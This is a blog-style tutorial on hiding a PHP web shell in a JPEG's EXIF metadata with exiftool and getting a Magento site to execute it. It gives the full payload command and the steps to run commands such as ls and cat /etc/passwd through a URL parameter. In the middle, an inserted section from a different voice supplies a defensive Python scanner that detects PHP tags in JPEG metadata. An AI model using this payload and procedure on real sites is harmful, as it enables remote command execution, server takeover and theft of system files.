PHP Shell in a JPEG, aka Froghopper

This one took me a while to figure out, probably longer than it should have, so it gets its own post. There's some information scattered around the internet for it, and I wanted to piece it all together in one spot.

Exiftool

Exiftool is an open source tool for reading and writing metadata in image, audio, and video files. It has a lot of options, but the one we're most interested in is writing the EXIF DocumentName tag, because whatever we put there is stored as plain text inside the JPEG's metadata segment, not in the pixel data.

Exiftool is not installed by default on Kali Linux, so run apt-get install exiftool if needed.

Listing the tags of a picture of a frog I grabbed off the internet shows the default fields and their values. We can tweak them, and add a PHP shell, with the following syntax:

exiftool -DocumentName="<h1>Testing<br><?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '</pre>';} __halt_compiler();?></h1>" frog.jpg

We include the Testing heading so that when we preview the page later we can verify that it is at least loading. The __halt_compiler() call matters too: it stops PHP from parsing anything after that point, so the binary JPEG data that follows the tag never reaches the parser and never shows up in the output. We can then use exiftool to verify that the DocumentName tag has been written:

And if we open the image, it still displays normally: the payload lives in the metadata, not the picture itself.
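As an added example (not code from the original post or from the Froghopper write-up), the following Python does the two checks a practitioner wants at this point: it walks the JPEG's marker segments, pulls DocumentName back out of the Exif APP1 segment much as exiftool does when you verify the write, and, for the defensive side, flags any metadata segment that carries a PHP open tag. The sample image is constructed in code rather than read from frog.jpg so that it runs offline, and the payload string is a shortened version of the one above; all function and constant names are my own.

```python
"""Added example (not from the original post): inspect a JPEG's metadata
segments, pull the EXIF DocumentName tag back out, and flag any segment that
carries a PHP open tag.  The sample image is constructed in code and is not a
real picture."""
import struct
import sys

EOI, SOS, APP1 = 0xD9, 0xDA, 0xE1
TAG_DOCUMENT_NAME = 0x010D          # TIFF/EXIF tag that exiftool calls DocumentName
ASCII = 2                           # TIFF type code for NUL-terminated ASCII
PHP_OPENERS = (b"<?php", b"<?=")    # open tags PHP honours regardless of short_open_tag


def iter_segments(data: bytes):
    """Yield (marker, payload_offset, payload) for each marker segment up to SOS."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected 0xFF marker prefix at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:                       # fill byte between segments
            pos += 1
            continue
        if marker == EOI:
            return
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]   # includes the 2 length bytes
        payload = data[pos + 4:pos + 2 + length]
        yield marker, pos + 4, payload
        if marker == SOS:                        # entropy-coded image data follows; stop
            return
        pos += 2 + length


def exif_document_name(app1: bytes):
    """Parse the TIFF structure inside an Exif APP1 payload; return DocumentName or None."""
    if not app1.startswith(b"Exif\x00\x00"):     # e.g. an XMP APP1 segment
        return None
    tiff = app1[6:]
    endian = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if endian is None or struct.unpack(endian + "H", tiff[2:4])[0] != 42:
        raise ValueError("bad TIFF header in APP1")
    ifd = struct.unpack(endian + "I", tiff[4:8])[0]
    count = struct.unpack(endian + "H", tiff[ifd:ifd + 2])[0]
    for i in range(count):
        entry = ifd + 2 + 12 * i
        tag, typ, n, val = struct.unpack(endian + "HHI4s", tiff[entry:entry + 12])
        if tag == TAG_DOCUMENT_NAME and typ == ASCII:
            if n <= 4:                           # values of 4 bytes or fewer are stored inline
                raw = val[:n]
            else:                                # otherwise val is an offset into the TIFF block
                off = struct.unpack(endian + "I", val)[0]
                raw = tiff[off:off + n]
            return raw.rstrip(b"\x00").decode("latin-1")
    return None


def document_name(data: bytes):
    """DocumentName from the first Exif APP1 segment of a JPEG, or None."""
    for marker, _, payload in iter_segments(data):
        if marker == APP1:
            name = exif_document_name(payload)
            if name is not None:
                return name
    return None


def find_php_tags(data: bytes):
    """Return [(segment_name, absolute_offset)] for every metadata segment holding a PHP open tag."""
    hits = []
    for marker, offset, payload in iter_segments(data):
        name = f"APP{marker - 0xE0}" if 0xE0 <= marker <= 0xEF else f"0x{marker:02X}"
        for opener in PHP_OPENERS:
            idx = payload.find(opener)
            if idx != -1:
                hits.append((name, offset + idx))
    return hits


def build_exif_jpeg(doc_name: str) -> bytes:
    """Constructed test input: SOI, one little-endian Exif APP1 carrying DocumentName, EOI.
    Not a decodable picture; it only exercises the container and TIFF parsing."""
    value = doc_name.encode("latin-1") + b"\x00"
    ifd = 8                                      # IFD0 directly after the 8-byte TIFF header
    value_off = ifd + 2 + 12 + 4                 # entry count + one entry + next-IFD pointer
    if len(value) <= 4:
        entry = struct.pack("<HHI", TAG_DOCUMENT_NAME, ASCII, len(value)) + value.ljust(4, b"\x00")
        tail = b""
    else:
        entry = struct.pack("<HHII", TAG_DOCUMENT_NAME, ASCII, len(value), value_off)
        tail = value
    tiff = b"II*\x00" + struct.pack("<I", ifd) + struct.pack("<H", 1) + entry + struct.pack("<I", 0) + tail
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8" + b"\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


if __name__ == "__main__":
    # Scan a real file if one is given on the command line, otherwise the constructed sample.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_exif_jpeg(
        "<h1>Testing<br><?php system($_REQUEST['cmd']); __halt_compiler();?></h1>")
    print("DocumentName:", document_name(data))
    print("PHP open tags:", find_php_tags(data) or "none")
```

Run it against the real file with python3 check_jpeg.py frog.jpg (file name assumed); the equivalent check with exiftool itself is exiftool -DocumentName frog.jpg. The walker stops at the SOS marker, so it only covers metadata segments; a payload appended after EOI or tucked into the scan data would need a whole-file search, which is why an extension check or a thumbnail preview is no defence against this kind of upload.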

I won’t go into extreme detail on where to upload the image, because it’s documented well here: https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper

But once you've uploaded it, you can verify that it uploaded properly by browsing to the upload directory in the URL.

And if we click on it, we see our frog.

Now, some websites will execute the PHP inside the image as soon as you request it directly. Most won't, because the web server hands a .jpg back as a static file. The Foregenix write-up linked above walks through how to get Magento to interpret the PHP inside the .jpg via the Newsletter template. The crucial thing is, once you've updated your template, make sure you Save it.

Once you've saved it, preview it. If things are working, the preview should show the Testing heading from the payload.

If you don't see it, double-check the Allow Symlinks setting mentioned in the link above.

Once you have this, copy the URL and paste it into a new tab. Then append ?cmd=ls to the end of the URL, and if everything works as hoped, the output of ls should appear in the page.

From here, you can change the command at the end of the URL to do things like cat the /etc/passwd file.
